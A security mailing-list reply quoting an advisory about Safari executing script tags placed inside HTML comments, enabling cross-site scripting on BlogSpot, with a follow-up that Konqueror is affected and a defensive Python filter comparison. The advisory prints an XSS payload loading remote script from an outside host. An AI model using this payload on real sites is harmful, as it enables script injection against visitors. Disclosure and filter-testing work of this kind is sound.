Jose Avila III wrote:
> Overview:
>
> Safari on occasions may improperly parse the source of an HTML document,
> which can lead to the execution of HTML tags within comments. This can
> become dangerous when input filters allow HTML tags within comments, as
> they will get parsed and executed under certain circumstances.
>
> Details:
>
> In some cases you can cause Apple's Safari browser to execute code when
> it should not be executed. In the following example everything within
> the comment, in theory, should never be executed; however, Safari decides
> to execute the script tag.
>
> <title>myblog<!--</title></head><body><script
> src=http://beanfuzz.com/bean.js> --></title>
>
> Blogs hosted on BlogSpot.com have filter mechanisms for their input;
> however, they will allow you to inject anything within comments. This
> made it possible to cross-site script blogspot.com. Note: only Safari
> viewers will be affected.
>
> Proof of concept: http://dirtybean1234.blogspot.com/
>
> Initial release of vulnerability: http://www.beanfuzz.com/wordpress/?p=99
>
> Vendor Response:
>
> I was unable to get a response from the vendor in regards to this issue.
>
> Questions / Comments:
> Jose (at) onzra (dot) com

As could be expected, the same problem exists in Konqueror (tested v.3.5.5 on Debian GNU/Linux Sid).

regards,
Robert Tasarz
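As an added illustration of the filtering point in the quoted advisory (example code written for this page, not from either poster or from the blog host): a filter that keeps comment bodies verbatim lets the sample markup through with its script tag intact, whereas one that drops comments outright leaves nothing for a lenient parser to execute. The regular expressions and function names are assumptions for the demonstration; the sample input is the markup from the advisory, plus a constructed unterminated-comment case.

```python
import re

# Sample input taken from the advisory: a <script> tag placed inside an HTML comment.
PAYLOAD = ('<title>myblog<!--</title></head><body>'
           '<script src=http://beanfuzz.com/bean.js> --></title>')

# A comment runs from "<!--" to the next "-->", or to end of input if it is
# never closed (the unterminated case is where lenient parsers diverge most).
COMMENT_RE = re.compile(r'<!--.*?(?:-->|$)', re.DOTALL)
# Any opening or closing tag; "<!--" does not match because "!" is not a letter.
TAG_RE = re.compile(r'</?[a-zA-Z][^>]*>')


def comment_preserving_filter(html: str) -> str:
    """Strip tags outside comments but keep comment bodies untouched.

    This mirrors the behaviour the advisory describes: anything inside a
    comment is passed through verbatim, tags included.
    """
    out, pos = [], 0
    for m in COMMENT_RE.finditer(html):
        out.append(TAG_RE.sub('', html[pos:m.start()]))
        out.append(m.group(0))          # comment kept as-is, script tag and all
        pos = m.end()
    out.append(TAG_RE.sub('', html[pos:]))
    return ''.join(out)


def comment_dropping_filter(html: str) -> str:
    """Remove comments wholesale (closed or not), then strip tags.

    Because comment text never reaches the output, it does not matter how a
    given browser decides to tokenize a '<!--' that appears mid-document.
    """
    return TAG_RE.sub('', COMMENT_RE.sub('', html))


def contains_script_tag(html: str) -> bool:
    """Detection check: does a <script> tag survive filtering?"""
    return re.search(r'<script\b', html, re.IGNORECASE) is not None


if __name__ == '__main__':
    for name, fn in (('preserving', comment_preserving_filter),
                     ('dropping', comment_dropping_filter)):
        result = fn(PAYLOAD)
        print(f'{name}: script survives = {contains_script_tag(result)}')
```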